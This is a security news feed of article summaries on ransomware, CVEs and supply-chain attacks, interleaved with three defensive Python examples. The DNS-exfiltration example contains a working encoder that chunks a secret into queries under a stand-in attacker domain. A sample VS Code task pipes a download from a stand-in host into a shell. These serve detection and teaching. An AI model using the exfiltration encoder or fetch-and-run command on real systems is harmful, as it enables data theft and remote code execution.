A 26-year-old Russian citizen has been sentenced in the U.S. to 6.75 years (81 months) in prison for his role in assisting major cybercrime groups, including the Yanluowang ransomware crew, in conducting numerous attacks against U.S. companies and other organizations. According to the U.S. Department of Justice (DoJ), Aleksei Olegovich Volkov facilitated dozens of ransomware attacks across the
Published: 2026-03-24T12:19:00
Citrix has released security updates to address two vulnerabilities in NetScaler ADC and NetScaler Gateway, including a critical flaw that could be exploited to leak sensitive data from the application. The vulnerabilities are listed below - CVE-2026-3055 (CVSS score: 9.3) - Insufficient input validation leading to memory overread CVE-2026-4368 (CVSS score: 7.7) - Race condition leading to user
Published: 2026-03-24T11:29:00
The North Korean threat actors behind the Contagious Interview campaign, also tracked as WaterPlum, have been attributed to a malware family tracked as StoatWaffle that's distributed via malicious Microsoft Visual Studio Code (VS Code) projects. The use of VS Code "tasks.json" to distribute malware is a relatively new tactic adopted by the threat actor since December 2025, with the attacks
Published: 2026-03-23T23:39:00
Another week, another reminder that the internet is still a mess. Systems people thought were secure are being broken in simple ways, showing many still ignore basic advisories. This edition covers a mix of issues: supply chain attacks hitting CI/CD setups, long-abused IoT devices being shut down, and exploits moving quickly from disclosure to real attacks. There are also new malware tricks
Published: 2026-03-23T18:44:00
AWS Bedrock is Amazon's platform for building AI-powered applications. It gives developers access to foundation models and the tools to connect those models directly to enterprise data and systems. That connectivity is what makes it powerful but it’s also what makes Bedrock a target. When an AI agent can query your Salesforce instance, trigger a Lambda function, or pull from a SharePoint
Published: 2026-03-23T17:25:00
Microsoft has warned of fresh campaigns that are capitalizing on the upcoming tax season in the U.S. to harvest credentials and deliver malware. The email campaigns take advantage of the urgency and time-sensitive nature of emails to send phishing messages masquerading as refund notices, payroll forms, filing reminders, and requests from tax professionals to deceive recipients into opening
Published: 2026-03-23T16:25:00
Cybersecurity researchers have uncovered malicious artifacts distributed via Docker Hub following the Trivy supply chain attack, highlighting the widening blast radius across developer environments. The last known clean release of Trivy on Docker Hub is 0.69.3. The malicious versions 0.69.4, 0.69.5, and 0.69.6 have since been removed from the container image library. "New image tags 0.69.5 and
Published: 2026-03-23T14:01:00
Threat actors are suspected to be exploiting a maximum-severity security flaw impacting Quest KACE Systems Management Appliance (SMA), according to Arctic Wolf. The cybersecurity company said it observed malicious activity starting the week of March 9, 2026, in customer environments that's consistent with the exploitation of CVE-2025-32975 on unpatched SMA systems exposed to the internet. It's
Published: 2026-03-23T11:45:00
Threat actors affiliated with Russian Intelligence Services are conducting phishing campaigns to compromise commercial messaging applications (CMAs) like WhatsApp and Signal to seize control of accounts belonging to individuals with high intelligence value, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) said Friday. "The campaign
Published: 2026-03-21T18:47:00
Oracle has released security updates to address a critical security flaw impacting Identity Manager and Web Services Manager that could be exploited to achieve remote code execution. The vulnerability, tracked as CVE-2026-21992, carries a CVSS score of 9.8 out of a maximum of 10.0. "This vulnerability is remotely exploitable without authentication," Oracle said in an advisory. "If successfully
Published: 2026-03-21T15:54:00
The threat actors behind the supply chain attack targeting the popular Trivy scanner are suspected to be conducting follow-on attacks that have led to the compromise of a large number of npm packages with a previously undocumented self-propagating worm dubbed CanisterWorm. The name is a reference to the fact that the malware uses an ICP canister, which denotes a tamperproof smart contract on
Published: 2026-03-21T13:55:00
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added five security flaws impacting Apple, Craft CMS, and Laravel Livewire to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to patch them by April 3, 2026. The vulnerabilities that have come under exploitation are listed below - CVE-2025-31277 (CVSS score: 8.8) - A vulnerability in Apple
Published: 2026-03-21T13:55:00
Trivy, a popular open-source vulnerability scanner maintained by Aqua Security, was compromised a second time within the span of a month to deliver malware capable of stealing sensitive CI/CD secrets. The latest incident impacted GitHub Actions "aquasecurity/trivy-action" and "aquasecurity/setup-trivy," which are used to scan Docker container images for vulnerabilities and set up GitHub Actions
Published: 2026-03-20T23:17:00
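The Trivy and Checkmarx entries above both describe the same failure mode: a third-party action referenced by a mutable tag, so a republished tag silently changes what the workflow runs. The script below is an added example, not code from Aqua Security, Checkmarx or the feed; it scans workflow YAML for `uses:` lines, flags any reference to the four actions the feed names (the affected tags are not given on this page, so every reference to them is reported for review), and flags every action that is not pinned to a full 40-hex commit SHA. The sample workflow and its commit hash are constructed for the example.

```python
import os
import re
from typing import Dict, List

# Actions the feed entries above report as compromised by TeamPCP. Any reference
# to them is flagged for review, because the affected tags are not listed here.
COMPROMISED_ACTIONS = {
    "aquasecurity/trivy-action",
    "aquasecurity/setup-trivy",
    "checkmarx/ast-github-action",
    "checkmarx/kics-github-action",
}

# `uses: owner/repo[/subdir]@ref`, optionally quoted. Local actions (./path) and
# docker:// images do not take this form and are intentionally not matched.
USES_RE = re.compile(
    r"""^\s*(?:-\s*)?uses:\s*['"]?([A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+)(?:/[^@'"\s]*)?@([^'"\s#]+)"""
)
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")

# Constructed sample workflow (not from any real repository); the SHA is made up.
SAMPLE_WORKFLOW = """\
name: scan
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - name: Trivy scan
        uses: aquasecurity/trivy-action@0.28.0
      - uses: checkmarx/kics-github-action@v2
      - uses: ./.github/actions/local-step
"""


def audit_workflow(text: str) -> List[Dict[str, object]]:
    """Return one finding per `uses:` line that references a listed compromised
    action or is pinned to something other than a full commit SHA."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = USES_RE.match(line)
        if not m:
            continue
        repo, ref = m.group(1), m.group(2)
        reasons = []
        if repo.lower() in COMPROMISED_ACTIONS:
            reasons.append("action reported as compromised; verify the pinned commit")
        if not FULL_SHA_RE.match(ref):
            reasons.append(f"ref {ref!r} is a mutable tag or branch, not a full commit SHA")
        if reasons:
            findings.append({"line": lineno, "action": repo, "ref": ref, "reasons": reasons})
    return findings


def audit_repo(root: str) -> Dict[str, List[Dict[str, object]]]:
    """Audit every workflow file under .github/workflows of a checkout."""
    wf_dir = os.path.join(root, ".github", "workflows")
    report: Dict[str, List[Dict[str, object]]] = {}
    if not os.path.isdir(wf_dir):
        return report
    for name in sorted(os.listdir(wf_dir)):
        if name.endswith((".yml", ".yaml")):
            path = os.path.join(wf_dir, name)
            with open(path, encoding="utf-8") as f:
                findings = audit_workflow(f.read())
            if findings:
                report[path] = findings
    return report


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    results = audit_repo(target) if target else {"<sample>": audit_workflow(SAMPLE_WORKFLOW)}
    for path, findings in results.items():
        for f in findings:
            print(f"{path}:{f['line']}: {f['action']}@{f['ref']}: {'; '.join(f['reasons'])}")
```

A SHA pin does not help if the pinned commit is itself the malicious one, but it makes a republished tag inert and gives you a concrete commit to compare against the vendor's advisory. Run it as `python audit_actions.py /path/to/checkout`; with no argument it audits the constructed sample and reports the two third-party steps that are both in the list and tag-pinned, while the SHA-pinned checkout step and the local action produce no findings.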
A critical security flaw impacting Langflow has come under active exploitation within 20 hours of public disclosure, highlighting the speed at which threat actors weaponize newly published vulnerabilities. The security defect, tracked as CVE-2026-33017 (CVSS score: 9.3), is a case of missing authentication combined with code injection that could result in remote code execution. "The POST /api/v1
Published: 2026-03-20T20:45:00
Google on Thursday announced a new "advanced flow" for Android sideloading that requires a mandatory 24-hour wait period to install apps from unverified developers in an attempt to balance openness with safety. The new changes come against the backdrop of a developer verification mandate the tech giant announced last year that requires all Android apps to be registered by verified developers to
Published: 2026-03-20T16:27:00
Artificial Intelligence (AI) is changing how individuals and organizations conduct many activities, including how cybercriminals carry out phishing attacks and iterate on malware. Now, cybercriminals are using AI to generate personalized phishing emails, deepfakes and malware that evade traditional detection by impersonating normal user activity and bypassing legacy security models. As a result,
Published: 2026-03-20T15:30:00
Sansec is warning of a critical security flaw in Magento's REST API that could allow unauthenticated attackers to upload arbitrary executables and achieve code execution and account takeover. The vulnerability has been codenamed PolyShell by Sansec owing to the fact that the attack hinges on disguising malicious code as an image. There is no evidence that the shortcoming has been exploited in
Published: 2026-03-20T15:00:00
The U.S. Department of Justice (DoJ) on Thursday announced the disruption of command-and-control (C2) infrastructure used by several Internet of Things (IoT) botnets like AISURU, Kimwolf, JackSkid, and Mossad as part of a court-authorized law enforcement operation. The effort also saw authorities from Canada and Germany targeting the operators behind these botnets, with a number of private
Published: 2026-03-20T11:55:00
Apple is urging users who are still running an outdated version of iOS to update their iPhones to secure against web-based attacks carried out via powerful exploit kits like Coruna and DarkSword. These attacks employ malicious web content to target out-of-date versions of iOS, triggering an infection chain that leads to the theft of sensitive data. "For example, if you're using an older
Published: 2026-03-20T10:46:00
Cybersecurity researchers have flagged a new malware dubbed Speagle that hijacks the functionality and infrastructure of a legitimate program called Cobra DocGuard. "Speagle is designed to surreptitiously harvest sensitive information from infected computers and transmit it to a Cobra DocGuard server that has been compromised by the attackers, masking the data exfiltration process as legitimate
Published: 2026-03-20T00:46:00
A new analysis of endpoint detection and response (EDR) killers has revealed that 54 of them leverage a technique known as bring your own vulnerable driver (BYOVD) by abusing a total of 35 vulnerable drivers. EDR killer programs have been a common presence in ransomware intrusions as they offer a way for affiliates to neutralize security software before deploying file-encrypting malware. This
Published: 2026-03-20T00:22:00
ThreatsDay Bulletin is back on The Hacker News, and this week feels off in a familiar way. Nothing loud, nothing breaking everything at once. Just a lot of small things that shouldn’t work anymore but still do. Some of it looks simple, almost sloppy, until you see how well it lands. Other bits feel a little too practical, like they’re already closer to real-world use than anyone
Published: 2026-03-19T19:55:00
Cybersecurity researchers have disclosed a new Android malware family called Perseus that's being actively distributed in the wild with an aim to conduct device takeover (DTO) and financial fraud. Perseus is built upon the foundations of Cerberus and Phoenix, at the same time evolving into a "more flexible and capable platform" for compromising Android devices through dropper apps distributed
Published: 2026-03-19T18:13:00
Security teams have spent years building identity and access controls for human users and service accounts. But a new category of actor has quietly entered most enterprise environments, and it operates entirely outside those controls. Claude Code, Anthropic's AI coding agent, is now running across engineering organizations at scale. It reads files, executes shell commands, calls external APIs,
Published: 2026-03-19T16:28:00
A new exploit kit for Apple iOS devices, designed to steal sensitive data from them, has been wielded by multiple threat actors since at least November 2025, according to reports from Google Threat Intelligence Group (GTIG), iVerify, and Lookout. According to GTIG, multiple commercial surveillance vendors and suspected state-sponsored actors have utilized the full-chain exploit kit, codenamed DarkSword
Published: 2026-03-19T14:44:00
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged government agencies to apply patches for two security flaws impacting Synacor Zimbra Collaboration Suite (ZCS) and Microsoft Office SharePoint, stating they have been actively exploited in the wild. The vulnerabilities in question are as follows - CVE-2025-66376 (CVSS score: 7.2) - A stored cross-site scripting
Published: 2026-03-19T11:35:00
The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) has sanctioned six individuals and two entities for their involvement in the Democratic People's Republic of Korea (DPRK) information technology (IT) worker scheme with an aim to defraud U.S. businesses and generate illicit revenue for the regime to fund its weapons of mass destruction (WMD) programs. "The North Korean
Published: 2026-03-18T22:56:00
Amazon Threat Intelligence is warning of an active Interlock ransomware campaign that's exploiting a recently disclosed critical security flaw in Cisco Secure Firewall Management Center (FMC) Software. The vulnerability in question is CVE-2026-20131 (CVSS score: 10.0), a case of insecure deserialization of user-supplied Java byte stream, which could allow an unauthenticated, remote attacker to
Published: 2026-03-18T21:30:00
Cybersecurity researchers have disclosed a critical security flaw impacting the GNU InetUtils telnet daemon (telnetd) that could be exploited by an unauthenticated remote attacker to execute arbitrary code with elevated privileges. The vulnerability, tracked as CVE-2026-32746, carries a CVSS score of 9.8 out of 10.0. It has been described as a case of out-of-bounds write in the LINEMODE Set
Published: 2026-03-18T18:00:00
When a Magecart payload hides inside the EXIF data of a dynamically loaded third-party favicon, no repository scanner will catch it because the malicious code never actually touches your repo. As teams adopt Claude Code Security for static analysis, this is the exact technical boundary where AI code scanning stops and client-side runtime execution begins. A detailed analysis of where Claude
Published: 2026-03-18T17:28:00
Cybersecurity researchers have warned about the risks posed by low-cost IP KVM (Keyboard, Video, Mouse over Internet Protocol) devices, which can grant attackers extensive control over compromised hosts. The nine vulnerabilities, discovered by Eclypsium, span four different products: GL-iNet Comet RM-1, Angeet/Yeeso ES3 KVM, Sipeed NanoKVM, and JetKVM. The most severe of them allow
Published: 2026-03-18T17:12:00
Security teams today are not short on tools or data. They are overwhelmed by both. Yet within the terabytes of alerts, exposures, and misconfigurations security teams still struggle to understand context: Q: Which exposures, misconfigurations, and vulnerabilities chain together to create viable attack paths to crown jewels? Even the most mature security teams can’t answer that
Published: 2026-03-18T16:00:00
A high-severity security flaw affecting default installations of Ubuntu Desktop versions 24.04 and later could be exploited to escalate privileges to the root level. Tracked as CVE-2026-3888 (CVSS score: 7.8), the issue could allow an attacker to seize control of a susceptible system. "This flaw (CVE-2026-3888) allows an unprivileged local attacker to escalate privileges to full root access
Published: 2026-03-18T13:38:00
Apple on Tuesday released its first round of Background Security Improvements to address a security flaw in WebKit that affects iOS, iPadOS, and macOS. The vulnerability, tracked as CVE-2026-20643 (CVSS score: N/A), has been described as a cross-origin issue in WebKit's Navigation API that could be exploited to bypass the same-origin policy when processing maliciously crafted web content. The
Published: 2026-03-18T12:01:00
Cybersecurity researchers have disclosed details of a new method for exfiltrating sensitive data from artificial intelligence (AI) code execution environments using domain name system (DNS) queries. In a report published Monday, BeyondTrust revealed that Amazon Bedrock AgentCore Code Interpreter's sandbox mode permits outbound DNS queries that an attacker can exploit to enable interactive shells
Published: 2026-03-17T22:09:00
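The BeyondTrust finding above rests on one property of the sandbox: outbound DNS is allowed even when other egress is not, so data can leave as query names that only the attacker's authoritative server needs to answer. The block below is an added example, not BeyondTrust's or Amazon's code, showing both sides in working form: the encoder that chunks a secret into hex labels under an attacker-controlled domain, and a detector that runs over resolver log lines and flags (client, parent domain) pairs with many distinct, long, high-entropy subdomains. The log format, the secret, the client addresses and the domain `exfil.test` are all constructed for the example; a production detector would also use the public suffix list and per-minute rates.

```python
import math
from collections import defaultdict
from typing import Dict, List

MAX_LABEL = 63  # RFC 1035 single-label limit; 30 bytes -> 60 hex characters

# Constructed secret and attacker domain (reserved .test TLD); not real data.
SECRET = (b"db_host=10.0.0.12;db_user=app;db_password=Tr0ub4dor&3;"
          b"api_token=0123456789abcdef0123456789abcdef;aws_region=us-east-1;"
          b"cache_key=deadbeefcafef00d")
EXFIL_DOMAIN = "exfil.test"


def encode_chunks(secret: bytes, domain: str, chunk_bytes: int = 30) -> List[str]:
    """Attacker side: one query per chunk, hex label + sequence label + domain.
    The resolver forwards each name to the domain's authoritative server,
    which is where the data is collected."""
    assert chunk_bytes * 2 <= MAX_LABEL
    return [f"{secret[i:i + chunk_bytes].hex()}.{i // chunk_bytes}.{domain}"
            for i in range(0, len(secret), chunk_bytes)]


def decode_chunks(qnames: List[str], domain: str) -> bytes:
    """Attacker side: reassemble the secret from the names the server observed."""
    parts = {}
    for q in qnames:
        if q.endswith("." + domain):
            hexdata, seq = q[: -len(domain) - 1].split(".")
            parts[int(seq)] = bytes.fromhex(hexdata)
    return b"".join(parts[k] for k in sorted(parts))


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parent_domain(qname: str) -> str:
    """Crude grouping key: the last two labels. Real deployments should use the
    public suffix list so that names under e.g. co.uk group correctly."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def find_exfil(log_lines: List[str], min_unique: int = 4,
               min_len: int = 16, min_entropy: float = 2.5) -> Dict[str, dict]:
    """Defender side: lines are '<epoch> <client> <qname>' (constructed format).
    Flag groups whose distinct subdomains are numerous, long and high-entropy;
    ordinary hostnames (www, api, mail) fail the length test."""
    groups: Dict[tuple, set] = defaultdict(set)
    for line in log_lines:
        if not line.strip():
            continue
        _ts, client, qname = line.split()
        parent = parent_domain(qname)
        sub = qname[: -len(parent) - 1] if qname != parent else ""
        groups[(client, parent)].add(sub)
    flagged = {}
    for (client, parent), subs in groups.items():
        subs = {s for s in subs if s}
        if len(subs) < min_unique:
            continue
        mean_len = sum(len(s) for s in subs) / len(subs)
        mean_ent = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        if mean_len >= min_len and mean_ent >= min_entropy:
            flagged[f"{client} -> {parent}"] = {"unique_subdomains": len(subs),
                                                "mean_len": round(mean_len, 1),
                                                "mean_entropy": round(mean_ent, 2)}
    return flagged


def sample_log() -> List[str]:
    """Constructed resolver log: benign lookups from one client, exfil from another."""
    benign = [f"170000000{i} 10.0.1.5 {h}.example.com"
              for i, h in enumerate(["www", "api", "cdn", "mail", "login"])]
    exfil = [f"17000001{i:02d} 10.0.2.9 {q}"
             for i, q in enumerate(encode_chunks(SECRET, EXFIL_DOMAIN))]
    return benign + exfil


if __name__ == "__main__":
    for key, stats in find_exfil(sample_log()).items():
        print(key, stats)
```

The detector deliberately keys on the parent domain rather than on any blocklist, because the attacker's domain is new by construction; what cannot be hidden is that each query name carries data and therefore never repeats. Where a sandbox truly needs no name resolution, the stronger fix is to not route its DNS at all.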
The ransomware operation known as LeakNet has adopted the ClickFix social engineering tactic delivered through compromised websites as an initial access method. The use of ClickFix, where users are tricked into manually running malicious commands to address non-existent errors, is a departure from relying on traditional methods for obtaining initial access, such as through stolen credentials
Published: 2026-03-17T20:04:00
A majority of security leaders are struggling to defend AI systems with tools and skills that are not fit for the challenge, according to the AI and Adversarial Testing Benchmark Report 2026 from Pentera. The report, based on a survey of 300 US CISOs and senior security leaders, examines how organizations are securing AI infrastructure and highlights critical gaps tied to skills shortages and
Published: 2026-03-17T17:00:00
TP-Link patched a high-severity flaw (CVE-2025-15517) in Archer NX routers that could let attackers bypass authentication and install malicious firmware. TP-Link issued security updates for its Archer NX router series to fix multiple vulnerabilities, including CVE-2025-15517 (CVSS score of 8.6), a high-severity authentication bypass flaw. The vulnerability impacts multiple models, including NX200, NX210, NX500, […]
Published: 2026-03-25T14:44:41
A Navia breach exposed personal data of nearly 300 HackerOne employees after attackers compromised the benefits provider. HackerOne revealed that a data breach at Navia Benefit Solutions exposed the personal information of nearly 300 of its employees. The incident stems from an attack on the third-party benefits provider, highlighting how breaches at external partners can […]
Published: 2026-03-25T12:37:14
The FCC will ban new foreign-made routers in the U.S. over security risks, unless approved by DHS or defense authorities. The U.S. FCC announced a ban on importing new foreign-made consumer routers, citing unacceptable cyber and national security risks. The decision, backed by Executive Branch assessments, means such devices can no longer be sold or […]
Published: 2026-03-25T11:22:21
Cybercrime group Lapsus$ claims it hacked AstraZeneca, stealing 3GB of data including credentials, code, and employee information. The Lapsus$ group claims it breached AstraZeneca, stealing about 3GB of sensitive data. The alleged leak includes credentials, tokens, internal code repositories (Java, Angular, Python), and employee information, though the company has not yet confirmed the breach. Even […]
Published: 2026-03-25T10:00:48
TeamPCP backdoored LiteLLM v1.82.7 and 1.82.8, likely via Trivy CI/CD, adding tools to steal credentials, move in Kubernetes, and keep persistent access. Threat actor TeamPCP compromised LiteLLM versions 1.82.7 and 1.82.8, likely through a Trivy CI/CD breach. LiteLLM, with over 95 million monthly downloads, helps developers route LLM requests via a single API. The malicious releases, now […]
Published: 2026-03-25T08:50:18
Dutch Ministry of Finance disclosed a data breach affecting some employees following a cyberattack; the investigation is ongoing. The Dutch Ministry of Finance disclosed a cyberattack detected on March 19 after a third-party alert. Attackers breached some internal systems, and the incident impacted a “portion of the employees”. Authorities are still investigating the incident and its full […]
Published: 2026-03-24T19:27:56
Over 3.1M people affected as QualDerm Partners suffered a December 2025 breach, exposing personal, medical, and health insurance data. Over 3.1 million people are affected by a December 2025 data breach at QualDerm Partners, where hackers stole personal, medical, and health insurance information from the company’s internal systems. QualDerm Partners is a U.S.-based healthcare management […]
Published: 2026-03-24T15:05:05
Citrix warns of a critical NetScaler flaw (CVE-2026-3055) that could leak sensitive data; users are urged to apply security updates immediately. Citrix issued security updates for two NetScaler vulnerabilities, including a critical memory overread, tracked as CVE-2026-3055 (CVSS score of 9.3), that allows unauthenticated attackers to leak sensitive data. The flaw CVE-2026-3055 is an insufficient […]
Published: 2026-03-24T12:46:49
U.S. sentences Russian hacker Aleksei Volkov to 81 months in prison for aiding ransomware attacks, causing over $9M in damages. A U.S. court sentenced Aleksei Olegovich Volkov to 81 months in prison for supporting ransomware groups like Yanluowang. He helped carry out dozens of attacks, causing over $9M in losses. Arrested in Italy in 2024 […]
Published: 2026-03-24T11:32:58
North Korea-linked threat actors use VS Code auto-run tasks to spread StoatWaffle malware via malicious projects that execute on folder open. North Korea-linked threat actor Team 8 behind the Contagious Interview campaign is spreading StoatWaffle malware through malicious Microsoft Visual Studio Code projects. Since late 2025, they have abused the “tasks.json” auto-run feature in Microsoft […]
Published: 2026-03-24T07:09:45
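Both StoatWaffle entries above hinge on one VS Code feature: a task in `.vscode/tasks.json` with `"runOptions": {"runOn": "folderOpen"}` is started when the folder is opened, so cloning a candidate's "project" and opening it is enough. The scanner below is an added example, not code from the researchers or from Microsoft; it walks a directory of checkouts, parses each `tasks.json` (which VS Code reads as JSON with comments and trailing commas, so a plain `json.loads` fails on real files), and prints every folder-open task together with the command it would run, including per-OS overrides. The sample `tasks.json` and its curl-to-shell payload are constructed for the example, with `example.invalid` as the host.

```python
import json
import os
import re
from typing import Any, Dict, List

# Constructed tasks.json (not from any real project): one normal build task and
# one that runs on folder open and fetches a script over HTTP.
SAMPLE_TASKS_JSON = """\
{
  // constructed sample, not from any real repository
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
    },
    {
      "label": "install deps",
      "type": "shell",
      "command": "node",
      "args": ["-e", "require('child_process').exec('curl -s http://example.invalid/x | sh')"],
      "runOptions": { "runOn": "folderOpen" }, /* starts on open */
    },
  ]
}
"""

PLATFORM_KEYS = ("windows", "linux", "osx")


def strip_jsonc(text: str) -> str:
    """Turn VS Code's JSON-with-comments into strict JSON: drop // and /* */
    comments outside string literals, then drop trailing commas before } or ].
    The trailing-comma pass is a regex over the comment-free text, so a string
    literal containing ",}" would also be touched; acceptable for tasks.json."""
    out: List[str] = []
    i, n, in_str = 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:   # keep the escaped character verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def _task_command(task: Dict[str, Any]) -> str:
    """Render what a task would execute, including windows/linux/osx overrides."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    rendered = " ".join(p for p in parts if p)
    for key in PLATFORM_KEYS:
        override = task.get(key)
        if isinstance(override, dict) and "command" in override:
            sub = [str(override["command"])] + [str(a) for a in override.get("args", [])]
            rendered += f" [{key}: {' '.join(sub)}]"
    return rendered


def autorun_tasks(tasks_json_text: str) -> List[Dict[str, str]]:
    """Return the tasks VS Code would start on folder open (runOn == folderOpen)."""
    data = json.loads(strip_jsonc(tasks_json_text))
    hits = []
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            hits.append({"label": str(task.get("label", "<unnamed>")),
                         "type": str(task.get("type", "")),
                         "command": _task_command(task)})
    return hits


def scan_tree(root: str) -> Dict[str, List[Dict[str, str]]]:
    """Report every .vscode/tasks.json under root that has folder-open tasks.
    Parse failures are reported too: a file json cannot read may still load in VS Code."""
    report: Dict[str, List[Dict[str, str]]] = {}
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in files:
            path = os.path.join(dirpath, "tasks.json")
            try:
                with open(path, encoding="utf-8-sig") as f:
                    hits = autorun_tasks(f.read())
            except (ValueError, OSError) as exc:
                hits = [{"label": "<parse error>", "type": "", "command": str(exc)}]
            if hits:
                report[path] = hits
    return report


if __name__ == "__main__":
    import sys
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else {"<sample>": autorun_tasks(SAMPLE_TASKS_JSON)}
    for path, hits in results.items():
        for h in hits:
            print(f"{path}: [{h['label']}] ({h['type']}) {h['command']}")
```

Run it over the directory where candidate or third-party projects are cloned before anyone opens them in the editor. The check is on the task definition, not on a signature of the payload, so a benign-looking label does not hide the command; on the workstation side, VS Code's `task.allowAutomaticTasks` setting governs whether such tasks run at all, which is worth confirming in managed settings (a setting I know of, not something the feed entries state).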